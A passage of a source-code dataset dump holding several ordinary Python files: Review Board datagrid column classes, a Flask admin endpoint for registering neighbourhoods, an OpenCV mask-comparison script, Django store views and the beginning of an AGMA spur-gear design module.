\"\"\"Indicates if a review group is starred.\n\n    The star is interactive, allowing the user to star or unstar the group.\n    \"\"\"\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        user = state.datagrid.request.user\n\n        if user.is_authenticated:\n            state.all_starred = set(\n                user.get_profile().starred_groups\n                .filter(pk__in=state.datagrid.id_list)\n                .values_list('pk', flat=True)\n            )\n\n        return queryset\n\n\nclass 
ReviewRequestIDColumn(Column):\n \"\"\"Displays the ID of the review request.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(ReviewRequestIDColumn, self).__init__(\n label=_('ID'),\n detailed_label=_('Review Request ID'),\n shrink=True,\n link=True,\n sortable=True,\n *args, **kwargs)\n\n def get_sort_field(self, state):\n \"\"\"Return the model field for sorting this column.\"\"\"\n if state.datagrid.local_site:\n return 'local_id'\n else:\n return 'id'\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n return review_request.display_id\n\n\nclass ReviewRequestStarColumn(BaseStarColumn):\n \"\"\"Indicates if a review request is starred.\n\n The star is interactive, allowing the user to star or unstar the\n review request.\n \"\"\"\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n user = state.datagrid.request.user\n\n if user.is_authenticated:\n state.all_starred = set(\n user.get_profile().starred_review_requests\n .filter(pk__in=state.datagrid.id_list)\n .values_list('pk', flat=True)\n )\n\n return queryset\n\n\nclass ShipItColumn(Column):\n \"\"\"Shows the \"Ship It\" and issue counts for a review request.\n\n If there are any issues still to resolve or verify, this will instead show\n information on those issues. Otherwise, it will show information on the\n number of Ship It! reviews filed.\n\n The following is the order of priority in which information is shown:\n\n 1. Open issues with issues requiring verification\n 2. Open issues\n 3. Issues requiring verification\n 4. Ship It! counts\n\n If showing a Ship It!, and if the latest review is older than the last\n update on the review request, the Ship It! will be marked as stale,\n helping visually indicate that it may need a re-review. The ARIA label\n reflects this as well.\n\n Version Changed:\n 5.0:\n * Added ARIA attributes for the displayed output.\n * Ship It! 
counts are now shown as stale if older than the latest\n update to the review request.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\n\n Args:\n *args (tuple):\n Additional arguments to pass to the parent constructor.\n\n **kwargs (dict):\n Additional keyword arguments to pass to the parent constructor.\n \"\"\"\n super(ShipItColumn, self).__init__(\n image_class='rb-icon rb-icon-datagrid-column-shipits-issues',\n image_alt=_('Ship It!/Issue Counts'),\n detailed_label=_('Ship It!/Issue Counts'),\n db_field='shipit_count',\n sortable=True,\n shrink=True,\n *args, **kwargs)\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\n\n Args:\n state (djblets.datagrid.grids.StatefulColumn):\n The state for the datagrid.\n\n review_request (reviewboard.reviews.models.review_request.\n ReviewRequest):\n The review request.\n\n Returns:\n django.utils.safestring.SafeText:\n The rendered HTML for the column.\n \"\"\"\n open_issues = review_request.issue_open_count\n verifying_issues = review_request.issue_verifying_count\n\n if open_issues > 0 and verifying_issues > 0:\n return self._render_counts(\n [\n {\n 'count': open_issues,\n 'title': _('Open issue count'),\n },\n {\n 'count': verifying_issues,\n 'css_class': 'issue-verifying-count',\n 'icon_name': 'issue-verifying',\n 'title': _('Verifying issue count'),\n },\n ],\n aria_label=(\n ngettext(\n '%(open_issue_count)d issue opened, '\n '%(verifying_issue_count)d requiring verification',\n '%(open_issue_count)d issues opened, '\n '%(verifying_issue_count)d requiring verification',\n open_issues)\n % {\n 'open_issue_count': open_issues,\n 'verifying_issue_count': verifying_issues,\n }\n ))\n elif open_issues > 0:\n return self._render_counts(\n [{\n 'count': open_issues,\n }],\n aria_label=(\n ngettext(\n '%(open_issue_count)d issue opened',\n '%(open_issue_count)d issues opened',\n open_issues)\n % {\n 'open_issue_count': open_issues,\n }\n ))\n elif verifying_issues > 0:\n return self._render_counts(\n [{\n 'count': verifying_issues,\n 'icon_name': 'issue-verifying',\n }],\n aria_label=(\n ngettext(\n '%(verifying_issue_count)d issue requiring '\n 'verification',\n '%(verifying_issue_count)d issues requiring '\n 'verification',\n verifying_issues)\n % {\n 'verifying_issue_count': verifying_issues,\n }\n ))\n elif review_request.shipit_count:\n container_css_classes = ['shipit-count-container']\n\n if (review_request.last_review_activity_timestamp and\n review_request.last_updated and\n (review_request.last_review_activity_timestamp <\n review_request.last_updated)):\n container_css_classes.append('-is-stale')\n aria_label = ngettext(\n \"%(shipit_count)d Ship It! (New updates to review)\",\n \"%(shipit_count)d Ship It's! (New updates to review)\",\n review_request.shipit_count)\n else:\n aria_label = ngettext(\n \"%(shipit_count)d Ship It!\",\n \"%(shipit_count)d Ship It's!\",\n review_request.shipit_count)\n\n return self._render_counts(\n [{\n 'count': review_request.shipit_count,\n 'css_class': 'shipit-count',\n 'icon_name': 'shipit',\n }],\n aria_label=aria_label % {\n 'shipit_count': review_request.shipit_count,\n },\n container_css_class=' '.join(container_css_classes))\n else:\n return ''\n\n def _render_counts(self,\n count_details,\n aria_label,\n container_css_class='issue-count-container'):\n \"\"\"Render the counts for the column.\n\n This will render a container bubble in the column and render each\n provided count and icon in the bubble. 
This can be used for issues,\n        Ship Its, or anything else we need down the road.\n\n        Version Added:\n            5.0:\n            * Added ``aria_label``.\n            * Removed the ``title`` key from ``count_details``.\n\n        Args:\n            count_details (list of dict):\n                The list of details for the count. Each supports the following\n                keys:\n\n                Keys:\n                    count (int):\n                        The count to show for the indicator.\n\n                    css_class (unicode, optional):\n                        The CSS class to use for the indicator.\n\n                    icon_name (unicode, optional):\n                        The name of the icon to use for the indicator.\n\n            aria_label (unicode):\n                The label to use for the ``aria-label`` attribute and the\n                ``title`` attribute.\n\n            container_css_class (unicode, optional):\n                The optional CSS class name for the outer container.\n\n        Returns:\n            django.utils.safestring.SafeText:\n                The resulting HTML for the counts bubble.\n        \"\"\"\n        # Note that the HTML is very whitespace-sensitive, so don't try to\n        # change the templates to be nicely indented. The spacing is this way\n        # for a reason.\n        #\n        # We also can't use format_html_join, unfortunately, as that doesn't\n        # support keyword arguments.\n        return format_html(\n            '<div class=\"{container_css_class}\" title=\"{aria_label}\"'\n
            ' aria-label=\"{aria_label}\" role=\"figure\">'\n            '{count_html}'\n            '</div>',\n
            aria_label=aria_label,\n            container_css_class=container_css_class,\n            count_html=mark_safe(''.join(\n                format_html(\n                    '<span class=\"{css_class}\">'\n                    '<span class=\"rb-icon rb-icon-{icon_name}\"'\n                    ' aria-hidden=\"true\"></span>'\n                    '{count}'\n                    '</span>',\n                    **dict({\n                        'css_class': 'issue-count',\n                        'icon_name': 'open-issues',\n                    }, **count_detail))\n                for count_detail in count_details\n            )))\n
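\n# Illustrative call (hypothetical values, added for clarity):\n#   self._render_counts([{'count': 2}], aria_label='2 issues opened')\n# renders a single bubble using the default 'issue-count' CSS class and the\n# default 'open-issues' icon, since **dict(defaults, **count_detail) fills in\n# any keys the caller omits.\n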
\n\nclass SummaryColumn(Column):\n    \"\"\"Shows the summary of a review request.\n\n    This will also prepend the draft/submitted/discarded state, if any,\n    to the summary.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(SummaryColumn, self).__init__(\n            label=_('Summary'),\n            expand=True,\n            link=True,\n            link_css_class='review-request-link',\n            css_class='summary',\n            sortable=True,\n            *args, **kwargs)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        user = state.datagrid.request.user\n\n        if user.is_anonymous:\n            return queryset\n\n        return queryset.extra(select={\n            'draft_summary': \"\"\"\n                SELECT reviews_reviewrequestdraft.summary\n                FROM reviews_reviewrequestdraft\n                WHERE reviews_reviewrequestdraft.review_request_id =\n                    reviews_reviewrequest.id\n            \"\"\",\n            'visibility': \"\"\"\n                SELECT accounts_reviewrequestvisit.visibility\n                FROM accounts_reviewrequestvisit\n                WHERE accounts_reviewrequestvisit.review_request_id =\n                    reviews_reviewrequest.id\n                AND accounts_reviewrequestvisit.user_id = %(user_id)s\n            \"\"\" % {\n                'user_id': str(user.id)\n            }\n        })\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\n\n        Args:\n            state (djblets.datagrids.grids.StatefulColumn):\n                The state for the datagrid.\n\n            review_request (reviewboard.reviews.models.review_request.\n                            ReviewRequest):\n                The review request.\n\n        Returns:\n            django.utils.safestring.SafeText:\n                The rendered column.\n        \"\"\"\n        summary = review_request.summary\n        labels = []\n\n        if review_request.submitter_id == state.datagrid.request.user.id:\n            if review_request.draft_summary is not None:\n                summary = review_request.draft_summary\n                labels.append(('label-draft', _('Draft')))\n            elif (not review_request.public and\n                  review_request.status == ReviewRequest.PENDING_REVIEW):\n                labels.append(('label-draft', _('Draft')))\n\n        # review_request.visibility is not defined when the user is not\n        # logged in.\n        if state.datagrid.request.user.is_authenticated:\n            if review_request.visibility == ReviewRequestVisit.ARCHIVED:\n                labels.append(('label-archived', _('Archived')))\n            elif review_request.visibility == ReviewRequestVisit.MUTED:\n                labels.append(('label-muted', _('Muted')))\n\n        if review_request.status == ReviewRequest.SUBMITTED:\n            labels.append(('label-submitted', _('Submitted')))\n        elif review_request.status == ReviewRequest.DISCARDED:\n            labels.append(('label-discarded', _('Discarded')))\n\n        result = [\n            format_html_join('', '<label class=\"{0}\">{1}</label>', labels)\n        ]\n\n        if summary:\n            result.append(format_html('<span>{0}</span>', summary))\n        else:\n            result.append(format_html('<span class=\"no-summary\">{0}</span>',\n                                      _('No Summary')))\n\n        return mark_safe(''.join(result))\n\n\nclass ReviewSummaryColumn(SummaryColumn):\n    \"\"\"Shows the summary of the review request of a review.\n\n    This does not (yet) prepend the draft/submitted/discarded state, if any,\n    to the summary.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(SummaryColumn, self).__init__(\n            label=_('Review Request Summary'),\n            expand=True,\n            link=True,\n            css_class='summary',\n            *args, **kwargs)\n\n    def render_data(self, state, review):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        return conditional_escape(review.review_request.summary)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        return queryset.select_related('review_request')\n\n\nclass ToMeColumn(Column):\n    \"\"\"Indicates if the user is requested to review the change.\n\n    This will show an indicator if the user is on the Target People reviewers\n    list.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        raquo = '\u00BB'\n\n        super(ToMeColumn, self).__init__(\n            label=raquo,\n            detailed_label=_('To Me'),\n            detailed_label_html=(gettext('%s To Me') % raquo),\n            shrink=True,\n            *args, **kwargs)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        user = state.datagrid.request.user\n\n        if user.is_authenticated:\n            state.all_to_me = set(\n                user.directed_review_requests.filter(\n                    pk__in=state.datagrid.id_list).values_list('pk',\n                                                               flat=True))\n        else:\n            state.all_to_me = set()\n\n        return queryset\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        if review_request.pk in state.all_to_me:\n            return ('<span title=\"%s\">»</span>'\n
                    % (self.detailed_label))\n
\n        return ''\n\n\nclass DiffSizeColumn(Column):\n    \"\"\"Indicates line add/delete counts for the latest diffset.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(DiffSizeColumn, self).__init__(\n            label=_('Diff Size'),\n            sortable=False,\n            shrink=True,\n            *args, **kwargs)\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        if review_request.repository_id is None:\n            return ''\n\n        diffsets = list(review_request.diffset_history.diffsets.all())\n\n        if not diffsets:\n            return ''\n\n        diffset = diffsets[-1]\n\n        counts = diffset.get_total_line_counts()\n        insert_count = counts.get('raw_insert_count')\n        delete_count = counts.get('raw_delete_count')\n        result = []\n\n        if insert_count:\n            result.append('<span class=\"diff-size-insert\">+%d</span>' %\n                          insert_count)\n\n        if delete_count:\n            result.append('<span class=\"diff-size-delete\">-%d</span>' %\n                          delete_count)\n\n        if result:\n            return ' '.join(result)\n\n        return ''\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\n\n        This will prefetch the diffsets and filediffs needed to perform the\n        line calculations.\n\n        Args:\n            state (djblets.datagrid.grids.StatefulColumn):\n                The column state.\n\n            queryset (django.db.models.query.QuerySet):\n                The queryset to augment.\n\n        Returns:\n            django.db.models.query.QuerySet:\n                The resulting queryset.\n        \"\"\"\n        # TODO: Update this to fetch only the specific fields when we move\n        #       to a newer version of Django.\n        return queryset.prefetch_related('diffset_history__diffsets',\n                                         'diffset_history__diffsets__files')\n","repo_name":"reviewboard/reviewboard","sub_path":"reviewboard/datagrids/columns.py","file_name":"columns.py","file_ext":"py","file_size_in_byte":39695,"program_lang":"python","lang":"en","doc_type":"code","stars":1513,"dataset":"github-code","pt":"34"}
{"seq_id":"31446826967","text":"from flask import request, jsonify, abort\nfrom . 
import api_v1\nfrom app import db, csrf\nfrom app.models.users import Usuario\nfrom app.models.places import Colonia\n\n@api_v1.route('/api/v1/acceso', methods=['POST'])\n@csrf.exempt\n@Usuario.token_required\ndef api_v1_post_colonia(current_user):\n\tif not current_user.admin : return abort(403)\n\tnombre = request.json['nombre']\n\tmunicipio = request.json['municipio']\n\tcp = request.json['cp']\n\tasentamiento = request.json['asentamiento']\n\tzona = request.json['zona']\n\n\tbuscar = Colonia.query.filter_by(fk_cp=cp).all()\n\tcontinuar = False\n\n\tfor i in buscar:\n\t\tif i.fk_municipio == int(municipio):\n\t\t\tcontinuar = True\n\t\t\tbreak\n\n\tif continuar:\n\t\tfor i in buscar:\n\t\t\tif i.nombre == nombre:\n\t\t\t\tcontinuar = False\n\t\t\t\tbreak\n\n\t\tif continuar:\n\t\t\tregistro = Colonia(nombre=nombre, fk_municipio=municipio, fk_cp=cp, fk_asentamiento=asentamiento, \n\t\t\t\t\t\t\t\tfk_zona=zona)\n\t\t\tdb.session.add(registro)\n\t\t\tdb.session.commit()\n\n\t\t\treturn jsonify({'result': 'Registration successful'})\n\t\telse:\n\t\t\treturn jsonify({'result': 'Colonia already registered'})\n\telse:\n\t\treturn jsonify({'result': 'The postal code does not belong to the given municipality'})\n","repo_name":"litocmvp/prueba_tecnica_1","sub_path":"app/routes/api/v1/private.py","file_name":"private.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"3133140586","text":"import cv2\nimport numpy as np\n\n\ndef baseline_model(corr_masks, uncorrected_masks, img_list, msk_list):\n    \"\"\"Calculates the accuracy based on the pixel-wise difference between images.\n\n    Args:\n        corr_masks (str): path to the directory of corrected masks\n        uncorrected_masks (str): path to the directory of uncorrected masks\n        img_list (list): filenames of the corrected masks\n        msk_list (list): filenames of the uncorrected masks\n    \"\"\"\n    accuracies = []\n    for i in range(len(img_list)):\n        img_1 = cv2.imread(corr_masks + img_list[i], 1)\n        img_2 = cv2.imread(uncorrected_masks + msk_list[i], 1)\n\n        res = cv2.absdiff(img_1, img_2)\n        res = res.astype(np.uint8)\n        percentage = np.round(100 - ((np.count_nonzero(res) * 100) / res.size), 2)\n        accuracies.append(percentage)\n    print(f\"The mean accuracy is equal to {round(np.mean(accuracies), 2)}\")\n    print(f\"These are the accuracies of the individual images: {accuracies}\")\n
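\n# Illustrative call (the paths and filenames below are hypothetical):\n#   baseline_model(\"data/corrected/\", \"data/uncorrected/\",\n#                  [\"img_001.png\"], [\"msk_001.png\"])\n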
images{list}\")\n","repo_name":"aaronlakeman/pore-type-segmentation-unet","sub_path":"modeling/baseline_model.py","file_name":"baseline_model.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"9606284003","text":"from django.shortcuts import render,get_object_or_404,HttpResponse\nfrom .models import Product,Variation\nfrom cart.models import Cart,CartIteam\nfrom cart.views import _get_cart_id\nfrom category.models import Category\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\n\ndef store(request,category_slug=None):\n\n products_count=0\n if category_slug != None:\n categories = get_object_or_404(Category,cat_slug=category_slug)\n products = Product.objects.all().filter(category=categories,is_available= True).order_by('id')\n products_count = len(products)\n page_obj = Paginator(products,3)\n page_number = request.GET.get(\"page\")\n products_page = page_obj.get_page(page_number)\n\n else :\n products = Product.objects.all().filter(is_available= True)\n products_count = len(products)\n page_obj = Paginator(products,3)\n page_number = request.GET.get(\"page\")\n products_page = page_obj.get_page(page_number)\n\n\n context = {\n 'products' : products_page,\n 'products_count':products_count,\n }\n return render(request,'store.html',context)\n\n\ndef product_detail(request,category_slug,product_slug):\n\n products = Product.objects.get(category__cat_slug=category_slug,slug=product_slug)\n\n context ={\n 'product' : products,\n\n }\n return render(request,'product-detail.html',context)\n\n\ndef search(request,products=None,products_count=0):\n if request.method == 'GET':\n keyword = request.GET.get('keyword')\n try:\n if keyword :\n products = Product.objects.filter(Q(product_name__icontains=keyword) | Q(description__icontains=keyword)).order_by('-created_at')\n products_count = len(products)\n except :\n print('\\033[1;31;40m Error in search \\033[0;0m')\n pass\n\n\n context = {\n 'products' : products,\n 'products_count':products_count,\n }\n return render(request,'store.html',context)","repo_name":"kumarrameg/greatkart","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9760671175","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 16 17:00:54 2022\r\n\r\n@author: valte\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport math as mt\r\nfrom ..Units import SI,rad_velocity,m2ft,ft2m,lbf2N,N2lbf\r\n\r\ndef Tr_from_H(H,n,unit = \"RPM\"):\r\n \"\"\"\r\n Calcula o torque em Nm baseado na rotação e potência.\r\n\r\n Parameters\r\n ----------\r\n H : float\r\n Potência de eixo, em W (Entrar em kW implica saída em Nmm).\r\n n : float\r\n Rotação do eixo. Unidades RPM ou rad/s. Deve-se indicar a unidade utili\r\n zando o parâmetro `unit`\r\n unit : str, optional\r\n Unidade da rotação. The default is \"RPM\".\r\n\r\n Returns\r\n -------\r\n Tr : float\r\n Torque no eixo.\r\n\r\n \"\"\"\r\n omega = rad_velocity(n,input_unit=unit,output_unit='rad/s')\r\n Tr = H/omega\r\n return Tr\r\n\r\ndef H_from_Tr(Tr,n,unit = \"RPM\"):\r\n \"\"\"\r\n Calcula a potência no eixo a partir do torque\r\n\r\n Parameters\r\n ----------\r\n Tr : Float\r\n Torque em Nm (Valores em Nmm resultam em H em kW).\r\n n : float\r\n Rotação do eixo. Unidades RPM ou rad/s. 
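\r\n# Illustrative check (not part of the original file), assuming rad_velocity\r\n# converts RPM to rad/s as its use here suggests: a 10 kW motor at 1450 RPM\r\n# gives omega = 1450*2*pi/60 = 151.8 rad/s, so Tr_from_H(10e3, 1450) is\r\n# about 65.9 Nm.\r\n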
Deve-se indicar a unidade utili\r\n zando o parâmetro `unit`\r\n unit : str, optional\r\n Unidade da rotação. The default is \"RPM\".\r\n\r\n Returns\r\n -------\r\n H : FLoat\r\n Potência.\r\n\r\n \"\"\"\r\n omega = rad_velocity(n,input_unit=unit,output_unit='rad/s') \r\n H = Tr*omega\r\n return H\r\n\r\ndef Wt_from_Tr(Tr,d):\r\n \"\"\"\r\n Calcula a carga transversal na engrenagem a partir do torque\r\n\r\n Parameters\r\n ----------\r\n Tr : Float\r\n Torque.\r\n d : Float\r\n Diametro nominal da engrenagem.\r\n\r\n Returns\r\n -------\r\n W_t : Float\r\n Carga transversal.\r\n\r\n \"\"\"\r\n W_t = 2*Tr/d\r\n return W_t\r\n\r\ndef Wt_from_H(H,d,n,unit=\"RPM\"):\r\n \"\"\"\r\n Força tranversal na engrenagem a partir da potência de eixo\r\n\r\n Parameters\r\n ----------\r\n H : float\r\n Potência de eixo, em W (Entrar em kW implica saída em Nmm).\r\n d : Float\r\n Diametro nominal da engrenagem.\r\n n : Float\r\n Rotação do eixo. Unidades RPM ou rad/s. Deve-se indicar a unidade utili\r\n zando o parâmetro `unit`\r\n unit : str, optional\r\n Unidade da rotação. The default is \"RPM\".\r\n\r\n Returns\r\n -------\r\n W_t : Float\r\n Força transversal.\r\n\r\n \"\"\"\r\n omega = rad_velocity(n,input_unit=unit,output_unit='rad/s')\r\n W_t = 2*H/(omega*d)\r\n return W_t\r\n\r\n\r\ndef adendum(P):\r\n return 1/P\r\n\r\ndef dedendum(P):\r\n return 1.25/P\r\n\r\ndef pitch_diam(m,N):\r\n return m*N\r\n\r\ndef base_thicknes(m):\r\n P = 1/m\r\n p = np.pi/P\r\n \r\n return p/2\r\n\r\ndef min_pinion_N(m,k=1,phi=20):\r\n \"\"\"\r\n Calcula o mínimo número de dentes no pinhão para evitar interferência\r\n\r\n Parameters\r\n ----------\r\n m : float\r\n Módulo transversa.\r\n k : TYPE, optional\r\n DESCRIPTION. The default is 1.\r\n phi : float, optional\r\n Angulo de pressão. The default is 20.\r\n\r\n Returns\r\n -------\r\n N: int\r\n Mínimo número de dentes do pinhão.\r\n\r\n \"\"\"\r\n phi = np.deg2rad(phi)\r\n return mt.ceil((2*k/((1+2*m)*np.sin(phi)**2))*(m+np.sqrt(m**2+(1+2*m)*np.sin(phi)**2)))\r\n\r\n\r\n\r\nclass SpurAGMA():\r\n \"\"\"\r\n Modela engrenagens cilíndricas de dentes retos e helicoidais conforme \r\n metodologia da AGMA.\r\n\r\n Parameters\r\n ----------\r\n F : float\r\n Largura de face em mm.\r\n P_t : float\r\n Passo transversal em mm.\r\n N_p : int\r\n N° de dentes do Pinhão.\r\n N_g : int\r\n N° de dentes da Coroa.\r\n poisson_p : float\r\n Coeficiente de Poisson do Material do Pinhão.\r\n poisson_g : float\r\n Coeficiente de Poisson do Material da Coroa.\r\n E_p : float\r\n Módulo de Young em GPa do Material do Pinhão.\r\n E_g : float\r\n Módulo de Young em GPa do Material da Coroa.\r\n Q_v : float\r\n Número de qualidade.\r\n n_p : TYPE\r\n DESCRIPTION.\r\n n_g : TYPE\r\n DESCRIPTION.\r\n N_cyc : int\r\n Número de ciclos para vida em fadiga.\r\n H_Bp : float\r\n Dureza Brinnel do pinhão.\r\n H_Bg : float\r\n Dureza Brinnel da Coroa.\r\n N_c : int, optional\r\n Número de dentes da cremalheira de fabricação. The default is 9999.\r\n r_c : float, optional\r\n Raio nominal da cremalheria de fabricação. The default is None.\r\n a_0 : float, optional\r\n Adendo admensional da cremalheira de fabricação. The default is 1.25.\r\n b_0 : float, optional\r\n Dedendo adimensional da cremalheira de fabricação. The default is 1.\r\n rho_a0 : TYPE, optional\r\n Raio de adoçamento da cremalheira de fabricação. The default is 0.25.\r\n x_0 :float, optional\r\n Folga adimensional de \"backlash\" da cremalheira de fabricação. 
\r\n\r\n\r\nclass SpurAGMA():\r\n    \"\"\"\r\n    Models cylindrical spur and helical gears following the AGMA\r\n    methodology.\r\n\r\n    Parameters\r\n    ----------\r\n    F : float\r\n        Face width in mm.\r\n    P_t : float\r\n        Transverse pitch in mm.\r\n    N_p : int\r\n        Number of pinion teeth.\r\n    N_g : int\r\n        Number of gear teeth.\r\n    poisson_p : float\r\n        Poisson's ratio of the pinion material.\r\n    poisson_g : float\r\n        Poisson's ratio of the gear material.\r\n    E_p : float\r\n        Young's modulus of the pinion material, in GPa.\r\n    E_g : float\r\n        Young's modulus of the gear material, in GPa.\r\n    Q_v : float\r\n        Quality number.\r\n    n_p : float\r\n        Pinion rotation speed.\r\n    n_g : float\r\n        Gear rotation speed (derived internally from n_p and the gear ratio).\r\n    N_cyc : int\r\n        Number of cycles for the fatigue life.\r\n    H_Bp : float\r\n        Brinell hardness of the pinion.\r\n    H_Bg : float\r\n        Brinell hardness of the gear.\r\n    N_c : int, optional\r\n        Number of teeth of the cutting rack. The default is 9999.\r\n    r_c : float, optional\r\n        Nominal radius of the cutting rack. The default is None.\r\n    a_0 : float, optional\r\n        Dimensionless addendum of the cutting rack. The default is 1.25.\r\n    b_0 : float, optional\r\n        Dimensionless dedendum of the cutting rack. The default is 1.\r\n    rho_a0 : float, optional\r\n        Fillet radius of the cutting rack. The default is 0.25.\r\n    x_0 : float, optional\r\n        Dimensionless backlash allowance of the cutting rack. The default is 0.\r\n    phi_n : float, optional\r\n        Pressure angle in deg. The default is 20.\r\n    psi : float, optional\r\n        Helix angle in deg. The default is 0.\r\n    delta_s_n : float, optional\r\n        Tooth modification parameter. The default is 0.024.\r\n    x : float, optional\r\n        Tooth addendum modifier. The default is 0.\r\n    load : str, optional\r\n        Tooth loading point: 'tip' for the tooth tip or 'HPSTC' for the\r\n        highest point of single-tooth contact. The default is \"tip\".\r\n    orientation : str, optional\r\n        Gear type: 'internal' for internal gears and 'external'\r\n        for external gears. The default is 'external'.\r\n    coroamento : bool, optional\r\n        Whether the teeth are crowned. The default is False.\r\n    detrimento_superficie : bool, optional\r\n        Whether surface detriment is present. The default is False.\r\n    engrenamento : str, optional\r\n        Type of gearing enclosure.\r\n        -1 or 'aberto': open gearing;\r\n        -2 or 'fecahdo comercial': commercial enclosed units;\r\n        -3 or 'fechado preciso': precision enclosed units;\r\n        -4 or 'fechado extra-preciso': extra-precision enclosed units.\r\n        The default is 'aberto' (open).\r\n    montagem_ajustada: bool, optional\r\n        Whether the mounting is adjusted at assembly. The default is False.\r\n    tratamento : str, optional\r\n        Type of surface treatment. The default is 'None'.\r\n    fonte_potencia : str, optional\r\n        Expected shock level of the power source. The default is 'uniforme'.\r\n    choque_maquina : str, optional\r\n        Expected shock level of the driven machine. The default is 'uniforme'.\r\n    trust : float, optional\r\n        Adopted reliability level. The default is 99.99.\r\n    temperatura : float, optional\r\n        Operating temperature in °C. The default is 20.\r\n\r\n\r\n\r\n    \"\"\"\r\n    def __init__(self,F,P_t,N_p,N_g,\r\n                 poisson_p,poisson_g,E_p,E_g,\r\n                 Q_v, n_p, n_g, N_cyc,\r\n                 H_Bp,H_Bg,\r\n                 N_c=9999,r_c=None,a_0 = 1.25,b_0=1,rho_a0=0.25,x_0 = 0,\r\n                 phi_n=20,psi=0,\r\n                 delta_s_n=0.024,x=0,\r\n                 load = \"tip\", orientation = 'external',\r\n                 coroamento = False, detrimento_superficie = False, \r\n                 engrenamento = 'aberto',montagem_ajustada=False,tratamento = 'None',\r\n                 fonte_potencia = 'uniforme', choque_maquina = 'uniforme',\r\n                 trust = 99.99, temperatura = 20):\r\n\r\n\r\n        \r\n        self.P = P_t\r\n        self.F = F\r\n        self.N_g = N_g\r\n        self.N_p = N_p\r\n        self.poisson_p = poisson_p\r\n        self.poisson_g = poisson_g\r\n        self.E_p = E_p*1e3\r\n        self.E_g = E_g*1e3\r\n        self.Q_v = Q_v\r\n        self.n_p = n_p\r\n        self.N_cyc = N_cyc\r\n        self.H_Bp = H_Bp\r\n        self.H_Bg = H_Bg\r\n        self.phi_n = np.deg2rad(phi_n)\r\n        self.psi = psi\r\n        self.x = x\r\n        self.delta_s_n = delta_s_n\r\n        self.N_c = N_c\r\n        self.rho_a0 = rho_a0\r\n        self.load = load\r\n        self.coroamento = coroamento \r\n        self.engrenamento = engrenamento\r\n        self.montagem_ajustada = montagem_ajustada\r\n        \r\n        phi_n = np.deg2rad(phi_n)\r\n        psi = np.deg2rad(psi)\r\n\r\n        phi = np.arctan2(np.tan(phi_n),np.cos(psi))\r\n        P = P_t/np.cos(psi)\r\n        \r\n        F = F*P # dimensionless\r\n        delta_s_n = F*delta_s_n\r\n        \r\n        #if psi == 0:\r\n        m_g = N_g/N_p\r\n        \r\n        n_g = n_p/m_g\r\n        \r\n        self.n_g = n_g\r\n        \r\n        if r_c == None:\r\n            r_c = N_c/(2*np.cos(psi))\r\n        r_bc = r_c-b_0\r\n\r\n        \r\n        \"Pinion dimensions\"\r\n        r_n = N_p/(2*np.cos(psi))\r\n        a = P*adendum(P)\r\n        b = P*dedendum(P)\r\n\r\n        x_g = x - (delta_s_n)/(2*np.tan(phi_n))\r\n        s_n = np.pi/2 + 2*x_g*np.tan(phi_n)\r\n        \r\n        r_a = (N_p/np.cos(psi) + 2*(1+x))/2\r\n        r_b = r_n*np.cos(phi)\r\n\r\n        self.r_n = r_n\r\n        self.a = a\r\n        self.b = b\r\n
